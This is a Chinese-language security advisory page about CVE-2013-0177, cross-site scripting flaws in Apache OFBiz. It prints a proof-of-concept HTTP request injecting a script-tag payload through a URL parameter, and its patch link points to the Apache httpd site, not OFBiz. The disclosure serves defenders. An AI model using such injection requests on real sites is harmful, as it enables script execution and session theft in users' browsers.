发布日期:2013-01-18
更新日期:2013-01-24受影响系统:
Apache Group OfBiz 10.4.2
Apache Group OfBiz 10.4.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57463
CVE(CAN) ID: CVE-2013-0177
Apache Open For Business(Apache OFBiz)是开源的ERP系统。
Apache OFBiz 10.04.05、11.04.02之前版本存在多个跨站脚本漏洞,攻击者可利用这些漏洞在受影响站点的用户浏览器中执行任意HTML和脚本代码。
<*来源:Juan Caillava
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
GET
/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"&gt;&lt;script&gt;alert("xss")&lt;/script&gt;
HTTP/1.1
Host: www.example.com:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101
Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer: https://www.example.com:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002建议:
--------------------------------------------------------------------------------
厂商补丁:
Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://httpd.apache.org/微软确认 Windows RT 更新 Bug,承诺2月份修复Drupal Core 多个访问绕过和跨站脚本漏洞相关资讯 OFBiz OFBiz安全漏洞
- OFBiz 配置文件 (05/26/2015 14:09:41)
- Apache OFBiz 13.07.01 发布下载 (10/08/2014 08:17:46)
- Apache OFBiz 12.04.03 发布下载 (06/20/2014 07:47:17)
| - Apache OFBiz 13.07.02 发布下载 (05/25/2015 08:07:14)
- Apache OFBiz 11.04.05/12.04.04 (08/21/2014 07:59:59)
- 浅谈OFBiz之权限设计 (03/18/2014 08:01:16)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站